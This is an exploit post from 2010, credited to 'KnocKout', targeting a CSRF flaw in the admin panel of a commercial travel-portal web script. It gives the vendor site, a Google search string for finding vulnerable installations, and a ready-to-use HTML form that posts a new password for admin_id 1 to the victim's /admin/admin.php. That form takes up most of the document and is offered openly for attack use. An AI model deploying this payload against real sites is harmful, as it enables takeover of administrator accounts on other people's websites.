===================================================== Travel PORTAL <= Admin Password Change (CSRF) Exploit ===================================================== ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Travel PORTAL |~Price : 299 Euro :) |~Version : N/A |~Software: http://www.tourismscripts.com |~Vulnerability Style : CSRF |~Vulnerability Dir : /admin |~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House " |[~]Date : "18.10.2010" |[~]Tested on : (L):Vista (R):Demos. ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ############################################################ the target can be changed according to <form method="post" action="http://VICTIM/admin/admin.php"> ############################################################ ~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~ ========(CSRF) Html Exploit========= <title>Exploited by KnocKout</title> </table> <br> <h3>Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout</h3> <table> <tr> <form method="post" action="http://server/admin/admin.php"> <input type="hidden" name="admin_id" value="1"> <td align=right>Admin Name:</td><td align=left>admin<td> </tr> <tr> <td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td> </tr> <tr> <td></td><td><input type="submit" name="submit" value="Update Password"></td> </form> </tr> </table> ========(CSRF) Html Exploit========= GoodLUCK.